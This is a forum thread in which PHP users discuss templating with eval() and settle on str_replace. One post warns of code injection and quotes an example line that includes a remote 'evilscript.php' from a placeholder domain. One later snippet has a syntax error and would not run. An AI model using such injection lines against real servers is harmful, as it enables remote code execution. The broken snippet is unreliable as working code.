Back To Programming / Scripting / Coding Forum

(PHP) Messin' with eval()

  • rtm223
  • Mastermind
  • Mastermind
  • User avatar
  • Joined: Mar 24, 2004
  • Posts: 1855
  • Loc: Uk
  • Status: Offline

Post July 1st, 2004, 8:01 am

ok well I was messing around with eval and came up with this idea:

PHP Code: [ Select ]
 
<?php
 
$string = 'this is the {$index}th element. It\'s value is \"{$value}\" <br />';
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
foreach($myArray as $index => $value){
 
   eval('echo("'.$string.'");');
 
}
 
 
 
?>
 
 
  1.  
  2. <?php
  3.  
  4. $string = 'this is the {$index}th element. It\'s value is \"{$value}\" <br />';
  5.  
  6. $myArray = array("damn", "this", "is", "cool");
  7.  
  8.  
  9.  
  10. foreach($myArray as $index => $value){
  11.  
  12.    eval('echo("'.$string.'");');
  13.  
  14. }
  15.  
  16.  
  17.  
  18. ?>
  19.  
  20.  


The idea being that I could write a block of html, and just put in variable names arbitrarily, using the single quotes to <b>not</b> expand the values straight away (because they have not been set :roll: ), or read from a file or db or whatever. Then later expand the variables (using that eval/echo thing) from an array, or different db value (I havn't really thought through how to use it lol).

What I really want to know is has PHP got anything built in to do this sort of thing, or am I just making things more complicated than they need to be? The output can be seen here BTW
CSS website design tutorials
  • Anonymous
  • Bot
  • No Avatar
  • Joined: 25 Feb 2008
  • Posts: ?
  • Loc: Ozzuland
  • Status: Online

Post July 1st, 2004, 8:01 am

  • rjstephens
  • Professor
  • Professor
  • User avatar
  • Joined: Jul 28, 2003
  • Posts: 774
  • Loc: Brisbane, Australia
  • Status: Offline

Post July 1st, 2004, 8:06 pm

rtm, what is wrong with this:
PHP Code: [ Select ]
 
<?php
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
foreach($myArray as $index => $value){
 
echo 'this is the '.$index.'th element. It\'s value is \"'.$value.'\" <br />';
 
}
 
 
 
?>
 
 
  1.  
  2. <?php
  3.  
  4. $myArray = array("damn", "this", "is", "cool");
  5.  
  6.  
  7.  
  8. foreach($myArray as $index => $value){
  9.  
  10. echo 'this is the '.$index.'th element. It\'s value is \"'.$value.'\" <br />';
  11.  
  12. }
  13.  
  14.  
  15.  
  16. ?>
  17.  
  18.  


or am I missing the point now?

Anyway, it is a good idea to avoid eval() at all costs because it is very easy for your visitors to insert php code into your script (ie include('http://domain.com/evilscript.php');, which would be included as if it were from your server. )
  • rtm223
  • Mastermind
  • Mastermind
  • User avatar
  • Joined: Mar 24, 2004
  • Posts: 1855
  • Loc: Uk
  • Status: Offline

Post July 2nd, 2004, 12:07 am

well the point was to keep the string OUTSIDE of the loop for easy editing and customisation. You don't have to sift through the code to alter little bits.

And I thought about the eval situation, but the string would probably be hard-coded into the script. If someone can alter the script, I don't think it matters if I am using eval() or not :P lol. I thought of a useful use also, I'll write an eg when I get to work.
CSS website design tutorials
  • rjstephens
  • Professor
  • Professor
  • User avatar
  • Joined: Jul 28, 2003
  • Posts: 774
  • Loc: Brisbane, Australia
  • Status: Offline

Post July 2nd, 2004, 12:52 am

rtm, the security risk depends on whether or not any of the variables in the eval come from user input. If they do, you have a security risk (unless you are VERY careful to properly escape them and such)

If your motivation is easy editing, then do something like this:
PHP Code: [ Select ]
 
<?php
 
 
 
$string = 'this is the [INDEX]th element. It\'s value is \"[VALUE]\" <br />';
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
foreach($myArray as $index => $value){
 
    echo(str_replace('[VALUE]', $value, str_replace('[INDEX]',$index, $string)));
 
}
 
 
 
?>
 
 
  1.  
  2. <?php
  3.  
  4.  
  5.  
  6. $string = 'this is the [INDEX]th element. It\'s value is \"[VALUE]\" <br />';
  7.  
  8. $myArray = array("damn", "this", "is", "cool");
  9.  
  10.  
  11.  
  12. foreach($myArray as $index => $value){
  13.  
  14.     echo(str_replace('[VALUE]', $value, str_replace('[INDEX]',$index, $string)));
  15.  
  16. }
  17.  
  18.  
  19.  
  20. ?>
  21.  
  22.  
  • rtm223
  • Mastermind
  • Mastermind
  • User avatar
  • Joined: Mar 24, 2004
  • Posts: 1855
  • Loc: Uk
  • Status: Offline

Post July 2nd, 2004, 1:09 am

rjstephens wrote:
rtm, the security risk depends on whether or not any of the variables in the eval come from user input.


*slaps self.

Thank you rjstephens, that makes an awful lot more sense, I didn't think this through very well. I'll just do it with a preg_replace() on all of the vars.

Thanks for pointing out the error of my ways :lol:

//edit, not preg_replace, because str_replace can take arrays:

PHP Code: [ Select ]
<?php
 
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
$varCodes=array(
 
   "[INDEX]",
 
   "[VALUE]"
 
);
 
 
 
foreach($myArray as $index => $value){
 
   $replaceCodes=array(
 
      $index,
 
      $value
 
   );
 
   echo(str_replace($varCodes,$replaceCodes,$string));
 
}
 
?>
  1. <?php
  2.  
  3. $string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
  4.  
  5. $myArray = array("damn", "this", "is", "cool");
  6.  
  7.  
  8.  
  9. $varCodes=array(
  10.  
  11.    "[INDEX]",
  12.  
  13.    "[VALUE]"
  14.  
  15. );
  16.  
  17.  
  18.  
  19. foreach($myArray as $index => $value){
  20.  
  21.    $replaceCodes=array(
  22.  
  23.       $index,
  24.  
  25.       $value
  26.  
  27.    );
  28.  
  29.    echo(str_replace($varCodes,$replaceCodes,$string));
  30.  
  31. }
  32.  
  33. ?>


Thanks again RJ, can't believe I didn't think of that. I think I'll just stick to never using eval() in PHP. Ever.

Now all I need to do is find a use for the code :roll:
CSS website design tutorials
  • rjstephens
  • Professor
  • Professor
  • User avatar
  • Joined: Jul 28, 2003
  • Posts: 774
  • Loc: Brisbane, Australia
  • Status: Offline

Post July 2nd, 2004, 2:07 am

rtm223 wrote:
*snip*
PHP Code: [ Select ]
<?php
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
$myArray = array("damn", "this", "is", "cool");
 
$varCodes=array(
   "[INDEX]",
   "[VALUE]"
);
 
foreach($myArray as $index => $value){
   $replaceCodes=array(
      $index,
      $value
   );
   echo(str_replace($varCodes,$replaceCodes,$string));
}
?>
  1. <?php
  2. $string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
  3. $myArray = array("damn", "this", "is", "cool");
  4.  
  5. $varCodes=array(
  6.    "[INDEX]",
  7.    "[VALUE]"
  8. );
  9.  
  10. foreach($myArray as $index => $value){
  11.    $replaceCodes=array(
  12.       $index,
  13.       $value
  14.    );
  15.    echo(str_replace($varCodes,$replaceCodes,$string));
  16. }
  17. ?>

*snip*


RTM, now I'm slapping myself, I should have thought of that.

//edit
while we're making the code as simple as possible, why not
PHP Code: [ Select ]
 
<?php
 
$string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
foreach($myArray as $index => $value){
 
   $replaceCodes=
 
   );
 
   echo(str_replace(
 
         array(
 
            "[INDEX]",
 
            "[VALUE]"
 
         ),
 
         array(
 
            $index,
 
            $value
 
         ),
 
         $string
 
      )
 
   );
 
}
 
?>
 
 
  1.  
  2. <?php
  3.  
  4. $string = "this is the [INDEX]th element. It's value is '[VALUE]' <br />";
  5.  
  6. $myArray = array("damn", "this", "is", "cool");
  7.  
  8.  
  9.  
  10. foreach($myArray as $index => $value){
  11.  
  12.    $replaceCodes=
  13.  
  14.    );
  15.  
  16.    echo(str_replace(
  17.  
  18.          array(
  19.  
  20.             "[INDEX]",
  21.  
  22.             "[VALUE]"
  23.  
  24.          ),
  25.  
  26.          array(
  27.  
  28.             $index,
  29.  
  30.             $value
  31.  
  32.          ),
  33.  
  34.          $string
  35.  
  36.       )
  37.  
  38.    );
  39.  
  40. }
  41.  
  42. ?>
  43.  
  44.  



of course, without all the tabs
  • rtm223
  • Mastermind
  • Mastermind
  • User avatar
  • Joined: Mar 24, 2004
  • Posts: 1855
  • Loc: Uk
  • Status: Offline

Post July 2nd, 2004, 3:02 am

Noooo, I say keep the tabs. No tabs does my head in lol. It's easier to make sure that the elements match in case you are a dufus like me. It looks kinda ugly if you take out the whitespace:
PHP Code: [ Select ]
echo(str_replace(array("[INDEX]","[VALUE]"),array($index,$value),$string));

I think that would start looking quite nasty with more than a couple of vars.... Maybe a compromise lol:
PHP Code: [ Select ]
$string = "this is the [INDEX]th element. Its value is '[VALUE]' <br />";
 
$myArray = array("damn", "this", "is", "cool");
 
 
 
foreach($myArray as $index => $value){
 
   echo(str_replace(
 
      array("[INDEX]","[VALUE]"),
 
      array( $index  , $value),
 
      $string)
 
   );
 
}
 
 
  1. $string = "this is the [INDEX]th element. Its value is '[VALUE]' <br />";
  2.  
  3. $myArray = array("damn", "this", "is", "cool");
  4.  
  5.  
  6.  
  7. foreach($myArray as $index => $value){
  8.  
  9.    echo(str_replace(
  10.  
  11.       array("[INDEX]","[VALUE]"),
  12.  
  13.       array( $index  , $value),
  14.  
  15.       $string)
  16.  
  17.    );
  18.  
  19. }
  20.  
  21.  

is looking nice and neat to me :D
Thanks again rjstevens.

//edit
ooooh, <b>without</b> the eval it is really easy to insert functions or strings with variables inside, as well as just plain old variables.... This is all looking extremely handy to me :)
CSS website design tutorials

Page 1 of 1

Post Information

  • Total Posts in this topic: 7 posts
  • Users browsing this forum: No registered users and 198 guests
  • You cannot post new topics in this forum
  • You cannot reply to topics in this forum
  • You cannot edit your posts in this forum
  • You cannot delete your posts in this forum
  • You cannot post attachments in this forum
 
cron
 

© 2011 Unmelted, LLC. Ozzu® is a registered trademark of Unmelted, LLC.